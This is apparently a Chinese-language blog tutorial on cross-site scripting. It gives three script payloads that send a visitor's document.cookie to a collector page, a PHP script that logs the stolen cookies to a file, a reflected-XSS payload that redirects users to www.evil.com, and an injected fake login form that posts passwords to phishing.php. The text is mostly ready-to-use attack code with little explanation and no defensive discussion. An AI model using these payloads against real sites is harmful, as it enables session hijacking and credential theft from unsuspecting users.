版权声明:本文为原创文章,未经作者允许不得任何个人、组织、机构以任何形式与名义进行转载 https://blog.csdn.net/qq_23217779/article/details/88538283
尝试操作Cookie
创建一个cookie,需要提供cookie的名字,值,过期时间和相关路径等
<?php
setcookie('user_id',123);
?>
它的作用是创建一个cookie变量user_id,值为123
在开发者工具中输入javascripit:alert(document.cookie)并执行就会弹出当前的cookie信息
获取客户端cookie信息
<script>document.location="http://127.0.0.1/XSS/save_cookie.php?cookie="+document.cookie</script>
<script>new image().src="http://127.0.0.1/XSS/save_cookie.php?cookie="+document.cookie</script>
<script>document.write('<img src="http://127.0.0.1/XSS/save_cookie.php?cookie="+document.cookie+ "width=0 height=0 border=0 />" ');</script>
接收cookie信息
<?php
$cookie = $_GET['cookie'];
$log = fopen("cookie.txt","a");
fwrite($log,$cookie."\n");
fclose($log);
?>
网络钓鱼
假设网页中存在以下代码
<a href="http://www.baidu.com/">http://www.google.com/</a>
访问google的请求将会被定向到baidu
XSS重定向钓鱼(XSS Redirect Phishing)
假设www.test.com上有一处xss:
http://www.test.com/index.php?search=[exploit]
那么当exploit为下时,用户将会从当前网站跳转到一个钓鱼网站
http://www.test.com/index.php?search=" '><script>document.location.href="http://www.evil.com/"</script>
HTML注入式钓鱼(XSS HTML Inject Phishing)
示例:
http://www.test.com/index.php?search="'<html><head><title>login</title></head><body><div style="text-align: center;"><form method="POST" action="phishing.php" name="form"><br /><br />Login:<br /><input name="login" /><br />password:<br /><input name="password" type="password"><br /><br /><input name="valid" value="OK" type="submit" /><br /></form></div></body></html>
效果
